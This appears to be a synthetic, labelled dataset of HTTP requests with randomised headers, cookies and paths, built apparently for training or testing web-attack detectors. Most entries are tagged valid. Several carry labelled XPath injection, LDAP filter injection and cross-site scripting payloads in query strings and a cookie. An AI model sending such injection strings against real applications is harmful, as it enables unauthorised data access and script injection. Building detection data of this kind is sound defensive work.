Date: Sun, 13 Jan 08 09:20:36 GMT
ETag: "jkPmPul2szt6mLKeLP"
If-Modified-Since: Wed, 26 Dec 07 23:36:33 GMT
If-Match: "4RZdimiwOsxfuDjU"
If-None-Match: "pIRxJZZe33nH.B71FO"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 01
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic UmVhZTpoYWhj
Range: -06354,383-6635,26244-
Referer: /ehyTi.zip
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.5 (Windows; U; WinNT 8.7; oc-cr; rv:9.0.4) Gecko/78800205
UA-Pixels: 069x3705
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: gzip
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44543
Start - Id: 31288
class: Valid
GET /J.Ah7LQIMrcpID4e/waguuT/3Ehnsed8dl0egInirshe/positionoptXXwfe/gxin7rIwUoK3Fu-lpDf/ivarhcps/o1.AiOPU0/80vHUsN4oQMV/LUL6nandJZ/3mlssns2r9paritadWbx.html? HTTP/1.1
Host: www.nwrdaeaaf.net
Connection: chdnfnbl
Accept: image/gif;q=0.2, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: vr-m, eIi56-i, emcalr-oehpta;q=0.2, mEuh0-mrTzqhr, Oler-dabbfsg
Cache-Control: no-store
Client-ip: 131.144.166.74
Cookie: TRjomailhmetcwE=ai;En7ioD89Oxhaal=ai'a+8s[eatxe;eUT-ERTyI=h76jRaollud;wWmAu7=3488862413;ahTxsdtsiim=71
Cookie2: $Version="4"
Date: Mon, 11 Sep 06 08:47:03 UTC
ETag: "lCT_GUX46BwiQ765a"
Expect: yrlwdutt=ehysoact;Rebaunc6=anedsrE
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Wed, 08 Jul 09 24:17:40 CET
If-Unmodified-Since: Mon, 08 Dec 08 05:29:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 8.7
Pragma: o='Louedn2e'
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: uzOsnr eorhnng=Yo4aOvk
Range: -388719
Referer: http://www.1oiwe.de/Qclntll/rntsuae/ZRe8.doc
TE: trailers,trailers
Trailer: If-Range
User-Agent: 3nwSzhet/5.9.9
UA-CPU: Sparc
UA-Disp: 5325,2370,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: ded/2.7 www.sNsoe.gif
Transfer-Encoding: compress
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 27483217
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31288
Start - Id: 18598
class: Valid
GET /usAa1ern8/uiInnekqW/oB9MUjS94f2-/pya9SoW3zmPErsR/xp_iZWD3wnbe/lXqDSCdeFxDPabs/p4W-NMucZJ1JR/ON7Zgrd50Rupdate4Gz/pAx80KKatuC/eTgOP.AB.css?c7as=5sosusioll&oib=ibetweenmtaccess_logti4rr&atgami1e4n3s=nskrtnair1sgseT&cbd=3fl HTTP/1.1
Host: 46.206.183.246
Connection: nncloh4
Accept: application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 191.119.143.118
Cookie: KSVnDSVS@._=iesqdnpjn2S29ta;snn886r=execrbodyak2es%a
Cookie2: $Version="71"
Date: Sun, 21 Aug 05 04:24:43 UTC
ETag: "vWm7vOC-z_8BLqnHk.@U"
Expect: eaat1ww
From: issa@v6tset.fr
If-Modified-Since: Fri, 13 Mar 09 04:40:29 GMT
If-Unmodified-Since: Fri, 06 Jun 08 06:23:45 CET
If-Match: "VIx98_4XQ1Ji4kmmf"
If-None-Match: *
If-Range: *
Max-Forwards: 6120
MIME-Version: 6.0
Pragma: to=n
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: Basic ZDF0Tm1uZDpsZG5kYXI0
Range: 0-15536,8-008663
Referer: /dyer6kt/mnad/eoppi.tar
TE: deflate;q=0.1
Trailer: If-Range
User-Agent: Mozilla/2.9 (compatible; Konqueror/7.9; Open BSD i386; ieclfr)
UA-CPU: StrongARM
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 144x748
Via: FTP/8.1 www.oeHas.png
Transfer-Encoding: cLsn
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18598
Start - Id: 35658
class: XPathInjection
GET /xwV0N0N3GAnTpniKdt/s5G/bNAZn/OvbetcHBwinntLiframeCUy.msf?qixob9fiiAolap=t5DiaoT%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or++%27bffssbE%27++%3D++%27 HTTP/1.1
Host: www.osis8sk.org:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 97.180.253.54
Cookie: jewerdcKyy=u8 2aqf6Jy&=s
Cookie2: $Version="07"
Date: Sun, 24 Feb 08 14:09:57 GMT
ETag: "UDJxFP191jf5i2WY"
Expect: takuent=f1qhab
From: njsh@NrDrfrcud.com
If-Modified-Since: Tue, 29 Mar 05 10:56:59 CET
If-Unmodified-Since: Wed, 20 Feb 08 04:32:40 UTC
If-Match: *
If-None-Match: "aksz6pGr7ZDHKs.y5B"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: tvqbts otO9e=Oh7KonRe
Authorization: Digest uri=http://www.eeeyeb.ch/ieiTstoe.tiff
Range: -472
Referer: /utTfha8n.conf
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: yXWjJa http://www.9nolssr.uk
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8105x4373
Via: 8.9 www.ysttes.jpeg:72, HTTP/8.6 155.185.245.126
Transfer-Encoding: compress
Upgrade: alcth4/9.0, omen/8.5
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35658
Start - Id: 48243
class: XSS
POST /eusT/i9M@6ndl5@L5UsG_pY_F/tgawvtpndibafcc/U0xoeXuqnnYdhadcyhq/sza/3MTcYAW9C5f8-Lfh2ODt/5oTqt/Drn5oaixeXtinyes/rjgrrI4UtAamoude/lsor/uSl8nk/mSDAga.htm? HTTP/1.1
Content-Length: 299
Content-Encoding: deflate
Content-Location: /qTonEe/asho7rsr/ci2tdlaa.nsf
Content-Type: application/x-www-form-urlencoded
Host: 244.82.165.194
Connection: c7ri
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: Ayg-Hyiattwr;q=0.8, noddhod-t0dr;q=0.5, 1fvtee1o-o, ThiD8he-k81t, uas9s-ieteAn
Cookie: ethfeaooThCnace=aaoguae5me0ao;s7l=8313;rIti=<xml    id   ="   X    "><a   ><b   >&lt;script  >[alert  ('of');]&lt;/script  >;</b></a    ></xml  >;snejxosno0meee=h5nafarfsc8iiq2iO;gespiudchlri1=79345904;yn=th=h
Date: Tue, 14 Aug 07 20:52:27 GMT
Max-Forwards: 5299
MIME-Version: 5.6
Referer: /sHoo/nfcow.ace
User-Agent: Mozilla/8.2 (X11; U; Linux i586 7.3; Ng-ol; rv:6.5.5) Gecko/02320251
UA-CPU: 68000
UA-Disp: 344,654,32
UA-Color: color16
Transfer-Encoding: gzip

lsn=en eyagt8eohbee&ttebi=dten&etjqewnlaerogoP=0197&9onfrEolw7eay0h=125422&ortcihetcwyres=30&oYdeith=ttna |ia]object4rra&uht8nssteqty=54130867&n8dhbesrbat=uPthesci1D;c~v&ctReT9c2go=r6rek6e&myh=0559318&thrcnoe=71&r1=cEeeonullsrMobsheo&sRTqRnd0tgi4dAt=wr&tgGTiaz=deletei/n&ha4srsthI=86251034

End - Id: 48243
Start - Id: 6322
class: Valid
POST /tat/o2MzRp/tB/92sliquins/7sadIrnw4er6yvt1rhw/la/qhOuU-.HWDk/48ssDS3w9ees4s/fnodeeTu.0qQWa_v.exe? HTTP/1.1
Content-Length: 67
Content-Language: tinc,lcJ
Content-Encoding: compress
Content-Location: http://www.sumihgl.fr/etaiei.sh
Content-MD5: YWhlYWl0c2tuMmlxNThyTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 15:39:06 GMT
Last-Modified: Tue, 04 Apr 06 01:54:34 CET
Host: www.soaoTp.cz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 4.189.7.158
Cookie: GfTrSl2jrkomao=lxs2mt nhomeax$4Iepci i;hsyiitt1lfropnb=8615891;wst6tOaOeraoari=NnZZh5ctBmSt1n;uicreon=nt;ed=crmdo17(3;Lata9h93e=3deT
Cookie2: $Version="26"
Date: Tue, 29 May 07 22:13:20 GMT
ETag: "tV@OEWu5j_c9ci2"
Expect: miFr=fodlt;zoreEsSl
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Mon, 08 Nov 04 19:23:55 GMT
If-Unmodified-Since: Wed, 09 May 07 14:56:54 GMT
If-Match: *
If-None-Match: "3P0U9-hEfl20M0c.FO"
If-Range: *
Max-Forwards: 8698
MIME-Version: 0.0
Pragma: l='4Yidoebd'
Proxy-Authorization: NTLM bWN6YTNlbmV0TnJldG5pb2VudWVzdW42amU1cnJwZnNwZWxuNWZseXRzY2Fs
Authorization: cs19 itLIYb=t6dEe
Range: 137601-
Referer: http://21er.fr/ufnt.exe
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eYYC4XW http://www.meMabr3s.de
UA-CPU: StrongARM
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9611x0201
Via: HTTP/1.3 www.xeej.htm
Transfer-Encoding: compress
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 150.186.242.245
X-Serial-Number: 9387717978
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hnloTeimmdj=9852404&bre2qtqE=slavshus&ilte=29908&bsosxrp19nHppoc=72

End - Id: 6322
Start - Id: 49616
class: XPathInjection
GET /tDeB4rr/ChPM9R9/DzV1O/buAX2hLUuO2/A0awinnthxy7GusrG-/eSisevaoWn/5ogzuspG5XASrn/hE8rtrtinib/nebCfEbze.jsp?it=ht&fReUrandPJboot.iniq=r7MqBTFN&ytmnye=iee+eQla+replaceolo%28&nxuz=78835+++++or++++1%3C+++motx%2Fdadn%2Fil%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+++or++582%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 227.17.170.134:80
Connection: iswgtj
Accept: application/*, video/mpeg
Accept-Charset: utf-8, cp-932;q=0.2, x-mac-korean;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="39"
Date: Sun, 11 Mar 07 08:17:21 UTC
ETag: W/"lMw8.S1DcfJk@k0"
Expect: 100-continue
From: rrm2hTst@reeb.net
If-Modified-Since: Fri, 09 May 08 08:35:37 GMT
If-Unmodified-Since: Sun, 01 May 05 18:39:29 GMT
If-Match: "i8mZcFmMw@B2PFY-oU"
If-None-Match: "mkua0R-0Rnk8j2FdWsAb"
If-Range: "9E2RCRc4yeL3usjC-bn"
Max-Forwards: 2
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM bGN0bmlwc25pbjdicmlkNW10ekFjZXRuYWxhdWVpZWVo
Authorization: Digest opaque="Eatynuir"
Range: -098
Referer: http://www.nene.net/rtrbno/enegauj/n2thti/Nnadny/t4dzhto.gif
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 2.3; ea-oo; rv:2.6.7) Gecko/85718456
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 3.2 www.hn8Iz1.html, sdn5rt/7.0 184.180.55.30, 4.9 150.33.156.15:05158
Transfer-Encoding: identity
Upgrade: add/2.5
Warning: 399 www.p1ssqors.gif "rylcoTu7ua" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49616
Start - Id: 37152
class: LdapInjection
GET /bwdaEpnepie/od/doHhEczBkm/onmuleaviessLan/aaetrkec/boot.iniZ7KAE3oi/eEiteleeTmiOhhh.css?it=ejZxx3BkJ&TlefpqcosheMt=%29++%28+%7C%28kbory%3Di8*%29 HTTP/1.1
Host: 201.10.11.95
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, euc-tw;q=0.0, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=37859
Client-ip: 159.233.41.170
Cookie: WaaeSwOiCtogA9n=otad;iic=tSSzKnjlbQ4X;IEeyiTa2zohyot=+n;5eoaseeh=3974142
Cookie2: $Version="12"
Date: Wed, 02 Jul 08 11:38:03 CET
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: 100-continue
From: me0l@083jn.it
If-Modified-Since: Fri, 14 Oct 05 21:57:25 CET
If-Unmodified-Since: Thu, 19 Feb 09 12:58:52 UTC
If-Match: *
If-None-Match: "-rvKKPRd4m.3LtdxY"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 7
MIME-Version: 8.7
Pragma: oiiak='oeuithoe'
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: NTLM dG9ucml0anJpd29uU2I2dG5XT2FmZTFzZHRsYWxjb3JkZg==
Range: 183458-,10781-99705
Referer: /iaie/sdeogvb/ttCkom/dStIiet/aoik.png
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 9.3; cs-s7; rv:7.8.3) Gecko/15545678
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: 4.6 116.172.55.131, lDofha/8.0 www.sest.js, HTTP/4.7 16.151.11.180:16
Transfer-Encoding: identity
Upgrade: hzs/8.1, Sct/5.2, 1jwo4/3.2, u0ie/8.6, lheiu/9.7
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 246823247124
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37152
Start - Id: 19579
class: Valid
GET /tgo-M6.Z.JqhkV@USO/awr1hen9janHsierex.shtml? HTTP/1.1
Host: www.xsso.cz
Connection: BSee0sR
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=87
Client-ip: 74.39.86.157
Cookie: alEdk0S=59238353;tstNoHu=aad8sm
Cookie2: $Version="134"
Date: Fri, 15 May 09 19:22:03 CET
ETag: W/"SXup_SmNwWOnFcvZiBQ"
Expect: rrltvn
From: ripnot0@fthidg.cz
If-Modified-Since: Mon, 22 Aug 05 17:25:51 CET
If-Unmodified-Since: Wed, 13 May 09 09:29:57 GMT
If-Match: *
If-None-Match: "ZC8GYybI_WALZ2k4"
If-Range: Tue, 30 Oct 07 12:37:12 CET
Max-Forwards: 1
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest response="26f0Ddd9c3EF6aBbfeE8e5AF980aDe9d"
Authorization: Basic dW9jbDpwbGxLZQ==
Range: -24619,663906-01
Referer: /rs8w9of.jpeg
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 1.8; n7-Hb; rv:7.6.8) Gecko/79753910
UA-CPU: MIPS
UA-Disp: 187,0883,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4605x2042
Via: HTTP/2.8 104.204.145.85
Transfer-Encoding: gzip
Upgrade: tecthp/7.8
Warning: 408 115.192.90.4 "lvsu" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19579
Start - Id: 15641
class: Valid
GET /ekhhwtfqpeRuu/teddjott/rmrje/s@dvWz/oiehdgcmahveatesi/a0L64/MkMDj/lWnwtmp8c9/nfZ/ip.W-W6Fh/hste3Alh/stxZVhBk@purUMz.cfm?ytlpenfmpo=htacces%5Csetc&adminHfromXJ=e_-6LW&fe9yad3cEsf=5547389 HTTP/1.1
Host: www.7oEepday.org
Connection: iSeiK5i
Accept: */*
Accept-Charset: windows-1251;q=0.5, iso-8859-15;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.236.104.173
Cookie: rCreplaceUftpY=f)w
Cookie2: $Version="8"
Date: Thu, 14 Aug 08 22:19:20 GMT
ETag: "pGM9yZSdXA54TzV"
Expect: os6bi=AtHottq;ytotu
From: I7rTtta@huqE8t.de
If-Modified-Since: Tue, 08 Feb 05 12:41:22 CET
If-Unmodified-Since: Thu, 02 Oct 08 20:46:11 CET
If-Match: "ktQyFAOYpakeM502c8Y@"
If-None-Match: *
If-Range: Wed, 30 Aug 06 05:08:50 GMT
Max-Forwards: 8
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM YXJUbHRpZXZlaG9wbHN0cHdzbmV0bnBvemx0YVNpdHQ1bGxuaHdsb2pjc1R0M21p
Authorization: hnok Oehute=isMoljhh
Range: 3-,76842-90
Referer: http://eias.st/teTerhi/tngLal.asp
TE: deflate,deflate
Trailer: Warning
User-Agent: tfnlstcr (sssz36b; d7Dnvlf2g.; 5Ep50_t; 545WwoOIN; wsqA0o6OKc)
UA-CPU: PowerPC
UA-Disp: 6429,5125,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: HTTP/8.9 www.scis.css, 7.2 www.eotT.html, HTTP/0.1 www.s5m8w.shtml:12206
Transfer-Encoding: deflate
Upgrade: odwtz/6.3, AUn/9.5, aov1R/9.7, wrym/4.9, euo/6.2
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: --------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15641
Start - Id: 607
class: Valid
GET /wMAo.xAhS8pe64-ore/egG/tgCjl1uL/aNVirAx1@wPP2tS7JsC/fungroiedwuiecipm7/68nPcLIK/ehlnrmerixtHRghtrH/xhk7@h/j_.php3?SrdtDxY=0r4ssieu&hbeoTn4bnos8pT=34&iaedoetoseESn=ii&sr4sa9es=5431318546&zewex3rendhis=ed.6IR4ENG&hr7Rarl7=6756773389&tbhreh=9&prptdt=ximz&q.QHAvQx6=36785206 HTTP/1.0
Host: www.azags4t3t.ch:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-932;q=0.3
Accept-Encoding: 
Accept-Language: h-uoer7jao;q=0.9, n-arf
Cache-Control: min-fresh=031
Client-ip: 202.215.122.171
Cookie: 3tn=47;niyllmAsered=egoquibbu;rDsHru9qv=saeh;qAPxTu=izM-77Ba00I
Cookie2: $Version="098"
Date: Thu, 04 Nov 04 22:48:55 CET
ETag: "MI0nPVCyGL2S@fDb5aMc"
Expect: 100-continue
From: i7wh@s1dUih1sA.it
If-Modified-Since: Wed, 13 Aug 08 10:24:56 CET
If-Unmodified-Since: Sat, 15 Nov 08 22:14:15 GMT
If-Match: "I3BZijjz3nn03@Nm"
If-None-Match: *
If-Range: *
Max-Forwards: 0635
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM bXV0c2Vvb2JyZGVXcmdzbnB0ZnR0Zm9oWXJzbnN4Z3M=
Authorization: Basic dWppYWFydzpuc3NleWg=
Range: 00-
Referer: http://xxyw.biz/ioitteo/ssioEna6.exe
TE: gzip
Trailer: From
User-Agent: dmIjWi http://www.sinKZ.net
UA-CPU: Sparc
UA-Disp: 2226,321,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 412x961
Via: FTP/7.1 108.88.217.252, Omias/6.4 139.162.66.205, 0.6 www.Efunslun.html
Transfer-Encoding: gzip
Upgrade: ns7o/1.7, rd8q5/4.3
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 54.55.101.225
X-Serial-Number: 541499677250739
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 607
Start - Id: 19148
class: Valid
GET /xaner9tpeitaams/nnljboevu/Eohtl/hBI7xzSupc/gcex/w54_oSYhMwNEIXrmSe@E/dzML4MAx/aartlbmoghjotelrms/f82i/EVhKX090insert7U/aY@em7ECw2xeMKNMBq8z.htm?degSrd=dsock_stream+replacet&divKhttpsz=Ispsynaw%2FPimg&c2c=31528726&fepesghfeg=nHcservicesgina+Bt0aisscriptu&paAieina0t=8tmRafh&sr=06981850&mochaacnSoptEF=e%28u3&Nihl3t6eI=03134&hE9etfNo2rssu=+5eainclude0mI7eO&kt=autoexec%22%2B8cnh+%22oa6mmr&hxan=hWhiOrlj8iapgtA&uana=%24aa&nsijwNsk7nWbtsf=dhhCl&uw3rhgdg=elloadoN0rnfnofo&nH3Pb=isstdinmled HTTP/1.1
Host: www.Tdtdnph0.ch
Connection: eoie
Accept: */*;q=0.6
Accept-Charset: iso-8859-1, x-mac-turkish, x-mac-roman, euc-jp;q=0.1, cp-936;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 40.88.186.196
Cookie: cbooepararnka8=em;KvPt=rlvcs;ouyov=iV.rkCrqy;t9JiJ=bdyh) fue;9oesteOlesi=ieh;lnta1ttoe=rJi
Cookie2: $Version="746"
Date: Wed, 29 Jul 09 16:28:42 CET
ETag: W/"eKP35ifDThMvjLc-p"
Expect: strmdrs=wmanetts;rxms=ckveNs
From: wi5la4tl@ue6nMine5.biz
If-Modified-Since: Wed, 30 Dec 09 05:14:53 CET
If-Unmodified-Since: Fri, 13 Aug 04 03:32:21 CET
If-Match: "EzN7YnYkVlS6-A5d"
If-None-Match: "E@57J6ZbjFf.5xgIk2Z"
If-Range: "MKSQEd0Ac.1gCKr1pS"
Max-Forwards: 58
MIME-Version: 0.1
Pragma: uzrayiei='ds4hso'
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: Digest cnonce="Tkeesaeb"
Range: -26751,992963-79665,-06526
Referer: /iiveaDt/xytnre.php3
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 6.3; oe-t4; rv:0.0.6) Gecko/12247367
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8378x546
Via: 3.0 www.etiy6ne.html, FTP/9.8 www.Soe0o.shtml, FTP/5.5 67.78.81.203
Transfer-Encoding: identity
Upgrade: ioe/1.7, mcilol/7.0
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19148
Start - Id: 21547
class: Valid
GET /sj7/ssbvS9crk/eAoed/exQvz/eB3pIktV4Aj3qrd.shtml?5s=e9268 HTTP/1.0
Host: 216.90.224.186:9841
Connection: close
Accept: text/xml;q=0.1, application/*;q=0.9, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.203.1.85
Cookie: 5yrl=Adao4xndiir7
Cookie2: $Version="213"
Date: Sat, 01 Oct 05 15:28:09 CET
ETag: W/"P0iQnQIgBdMSBXJ837Z8"
Expect: 100-continue
From: t1Gpd0t@aonx3yb.biz
If-Modified-Since: Tue, 28 Feb 06 07:47:24 UTC
If-Unmodified-Since: Wed, 15 Jul 09 09:17:38 UTC
If-Match: *
If-None-Match: "wOuUVWYoJG8TSonsL"
If-Range: Sun, 15 Jun 08 22:18:04 GMT
Max-Forwards: 29
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YnQ4bmh5OGg0dFFybG5kcjVnYWVldHVjaXdlY25lbGF0
Authorization: Digest opaque="gyss"
Range: 2514-,-4567,968-760
Referer: /N3mvep4/siAAcsXt/eeni3/7pnlethz.php3
TE: gzip,gzip,gzip;q=0.5
Trailer: Referer
User-Agent: e5paei7 (keO.Vh; 5U3074lRc; sTtyio)
UA-CPU: StrongARM
UA-Disp: 9153,8066,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0542x2765
Via: 9.9 www.sweed8.tiff
Transfer-Encoding: hndh; tetr=1granah
Upgrade: dmh/1.5, elpleh/2.3, bhbR/2.5, axes/9.3
Warning: 105 194.179.101.101:797 "yfe4eht3aAartosoia" "Tue, 19 Jul 05 17:23:33 GMT"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 42015
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21547
Start - Id: 743
class: Valid
GET /tmsrweljtuddbt/f1/Iueasege326dsHt/oi9ryeeeo/moqodn/UEAq/n6pr/dpfXTI/lRu9neYiesajpgqo7lSr/wfKp.php4?idA=5846898&rfvAlenh5=cCsogen&rztevosdooeet=rssi HTTP/1.1
Host: 11.159.20.114
Connection: close
Accept: audio/*, application/*, text/html
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ha-2aa;q=0.2, eSd-L
Cache-Control: no-store
Client-ip: 17.204.45.180
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="6"
Date: Sun, 22 Jul 07 21:22:54 UTC
ETag: W/"kX_5AQzVKf4QRAM"
Expect: ullec8ii=asBEe
From: eet5ayi@trifo.it
If-Modified-Since: Mon, 27 Mar 06 14:37:40 GMT
If-Unmodified-Since: Mon, 10 Oct 05 22:32:06 CET
If-Match: "zZh0hekxi8Uz40NqpyX"
If-None-Match: *
If-Range: "2yVMuxgdm_@XqSs"
Max-Forwards: 208
MIME-Version: 2.7
Pragma: sswhrdi='nee'
Proxy-Authorization: cll2 orUtkN=3ekdTnt
Authorization: omellq osee=c1uolp
Range: 5-,-2734
Referer: http://Eise.it/exetix8/crntti/lirn/n9een/hhehoem.dll
TE: chunked
Trailer: Cache-Control
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 4.2; re-aw; rv:2.3.9) Gecko/14915299
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 879x7851
Via: thbe5z/1.1 www.BsstMl.gif, FTP/2.7 254.6.149.238:2562
Transfer-Encoding: compress
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 228 194.43.243.100 "i6jamotratateptotni" "Wed, 18 May 05 23:53:22 CET"
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 743
Start - Id: 12156
class: Valid
GET /uis6/tehtmsprtltoeuCux/tre3ahg/es6/eirstyXcisLp/ndpytinrt3ledtoo/xhlt8o1gmAaIe/oUtB0/EAoT/replacek3rmYWE/5aonrmfpsthecb9asf1d.mspx?Y-4dWYimghyQU=einaTb2+apsstyleb%3FhUmeta&oRepaufasi=725&8rmC3TTupdateg=a%40moO%40jkt&neCmont5cst=j5o&Dg6deleteT1c4tx=acceptere++%28%2Bin%40htpassincludeflt HTTP/1.0
Host: www.5eqrtsar.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 110.164.174.247
Cookie: iiDtW2h=6\teedbtrigilan;pgiRbnnssnltek=3;qWF2q=tttojwtoe7dateth9;seIbldtssacW=88471
Cookie2: $Version="2"
Date: Wed, 02 Sep 09 22:26:43 UTC
ETag: "5H7alzZE59rb@bbzAAA8"
Expect: 100-continue
From: 3llueiuh@dwE6ieEe.uk
If-Modified-Since: Fri, 22 Sep 06 08:00:14 GMT
If-Unmodified-Since: Tue, 14 Dec 04 04:30:29 CET
If-Match: *
If-None-Match: "mBOItQh1mNz_qz6cyZr"
